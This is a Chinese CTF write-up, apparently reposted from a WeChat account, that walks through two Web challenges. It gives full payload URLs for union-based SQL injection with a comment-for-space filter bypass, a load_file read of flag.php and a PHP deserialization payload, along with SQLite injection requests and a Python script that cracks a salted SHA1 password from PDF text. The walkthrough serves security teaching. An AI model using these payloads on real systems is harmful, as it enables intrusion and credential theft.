在CTF比赛中,Web题是最常见的题型,考点涉及到Web常见的漏洞如任意文件上传、SQL注入、文件包含等。其中SQL注入又是重中之重,根据题目的难度,往往会是多种漏洞组合而成的题型。接下来举几个以前CTF比赛中比较经典的几道Web题。
facebook(SQL注入+php反序列化)
首先查看robots路径
访问/user.php.bak,得到源码,这里可以看到这里会对博客的地址进行正则匹配。
回到网站首页,join添加文章,添加后存在链接。
http://111.200.241.244:65355/view.php?no=1
手工测试是否存在注入
111.200.241.244:65355/view.php?no=2-1
http://111.200.241.244:65355/view.php?no=2-2
判断存在数字型注入
http://111.200.241.244:65355/view.php?no=1%20order%20by%204#
http://111.200.241.244:65355/view.php?no=1%20order%20by%205#
因此判断表中查询共有4列,使用unionselect查询,被拦截。
http://111.200.241.244:65355/view.php?no=-1%20unionselect%201,2,3,4#直接报错
说明拦截的是union select,而unionselect不拦截,考虑通过注释符替换空格,即union/**/select
成功绕过,且第二列内容显示在页面上。
接下来进行查询库、表的内容
http://111.200.241.244:65355/view.php?no=-1%20union/**/select%201,group_concat(schema_name),3,4%20from%20information_schema.schemata%20#
http://111.200.241.244:65355/view.php?no=-1%20union/**/select%201,group_concat(table_name),3,4%20from%20information_schema.tables%20where%20table_schema=%22fakebook%22#
http://111.200.241.244:65355/view.php?no=-1%20union/**/select%201,group_concat(column_name),3,4%20from%20information_schema.columns%20where%20table_schema=%22fakebook%22#
http://111.200.241.244:65355/view.php?no=-1%20union/**/select%201,group_concat(data),3,4%20from%20fakebook.users#
这里可以通过mysql load_file函数直接读取flag.php文件
http://111.200.241.244:65355/view.php?no=-1%20union/**/select%201,load_file(%22/var/www/html/flag.php%22),3,4#
flag{c1e552fdf77049fabf65168f22f7aeab}
此外还可通过构造php反序列化读取数据
http://111.200.241.244:65355/view.php?no=-1%20union/**/select%201,2,3,%27O:8:%22UserInfo%22:3:{s:4:%22name%22;s:4:%22test%22;s:3:%22age%22;i:123;s:4:%22blog%22;s:29:%22file:///var/www/html/flag.php%22;}%27
查看页面源代码,base64解码可得
FlatScience(SQL注入+pdf)
查看Robots.txt路径
查看login.php源代码
可以看到有参数debug,访问得到
http://111.200.241.244:59943/login.php?debug
从这里可以看到usr参数处很可能存在注入,同时这里数据库为sqlite
抓包构造注入
usr=-123' union select 'aaa','bbb'--+&pw=123
查询的第二个参数位,回显在Set-Cookie的name字段。
usr=-123' union select name,sql fromsqlite_master --+&pw=123
可以得到SQL语句+CREATE+TABLE+Users%28id+int+primary+key%2Cname+varchar%28255%29%2Cpassword+varchar%28255%29%2Chint+varchar%28255%29%29;
即
CREATE TABLE Users(id int primary key,namevarchar(255),password varchar(255),hint varchar(255));
接下来查询各个列的数据
usr=-123' union select 1,group_concat(hint)from users --+&pw=123
usr=-123' union select 1,group_concat(id)from users --+&pw=123
usr=-123' union select 1,group_concat(name)from users --+&pw=123
usr=-123' union select 1,group_concat(password)from users --+&pw=123
分别得到结果如下:
|
Hint |
my fav word in my fav paper?!,my love is�,the password is password; |
|
id |
1,2,3; |
|
name |
admin,fritze,hansi; |
|
password |
3fab54a50e770d830c0416df817567662a9dc85c,54eae8935c90f467427f05e4ece82cf569f89507,34b0bb7c304949f9ff2fc101eef0f048be10d3bd; |
根据debug的页面我们知道,password是通过sha1函数对明文密码+Salz!进行哈希得到的。而hint中提到my fav word in my fav paper?!,因此密码可能存在在网页中的pdf文档中。
这里使用网上的脚本,爬取所有的pdf,并进行admin密码的爆破
from cStringIO import StringIO
from pdfminer.pdfinterp importPDFResourceManager, PDFPageInterpreter
from pdfminer.converter importTextConverter
from pdfminer.layout import LAParams
from pdfminer.pdfpage import PDFPage
import sys
import string
import os
import hashlib
def get_pdf():
return[i for i in os.listdir("./") if i.endswith("pdf")]
def convert_pdf_2_text(path):
rsrcmgr = PDFResourceManager()
retstr = StringIO()
device = TextConverter(rsrcmgr, retstr, codec='utf-8',laparams=LAParams())
interpreter = PDFPageInterpreter(rsrcmgr, device)
with open(path, 'rb') as fp:
for page in PDFPage.get_pages(fp, set()):
interpreter.process_page(page)
text = retstr.getvalue()
device.close()
retstr.close()
return text
def find_password():
pdf_path= get_pdf()
fori in pdf_path:
print"Searching word in " + i
pdf_text= convert_pdf_2_text(i).split(" ")
forword in pdf_text:
sha1_password= hashlib.sha1(word+"Salz!").hexdigest()
ifsha1_password == '3fab54a50e770d830c0416df817567662a9dc85c':
print"Find the password :" + word
exit()
if __name__ == "__main__":
find_password()
最终得到admin的密码为:ThinJerboa
登录后得到flag{Th3_Fl4t_Earth_Prof_i$_n0T_so_Smart_huh?}
原文始发于微信公众号(第59号):CTF之Web题型总结二
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论